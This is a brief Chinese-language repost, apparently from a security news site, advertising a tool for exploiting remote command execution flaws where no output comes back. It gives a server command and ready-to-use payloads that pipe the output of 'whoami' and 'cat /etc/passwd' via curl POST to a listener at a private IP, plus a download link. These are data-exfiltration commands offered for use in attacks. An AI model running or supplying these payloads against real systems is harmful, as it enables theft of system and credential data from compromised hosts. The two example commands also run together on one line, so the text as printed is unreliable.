RCE命令无回显利用工具

2024年3月25日09:54:54评论19 views字数 339阅读1分7秒阅读模式

工具介绍

RCE命令无回显利用工具，支持在Linux、Windows下使用，渗透测试中遇到执行命令无回显的场景时可以使用该工具通过curl外带命令达到回显的效果。

工具使用

1. 服务端部署，执行以下命令：

python3 app.py

2. 客户端请求，执行以下命令：

whoami | curl -X POST -d @- http://192.168.1.120:8881cat /etc/passwd | curl -X POST -d @- http://192.168.1.120:8881

3. 执行结果保存在当前目录下的data.txt文件中。

下载地址

https://github.com/shanxigetanxiaochou/curl-rce

原文始发于微信公众号（Hack分享吧）：RCE命令无回显利用工具

本文由 admin 发表于 2024年3月25日09:54:54
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
RCE命令无回显利用工具https://cn-sec.com/archives/2600928.html

针对目标已知信息的字典生成工具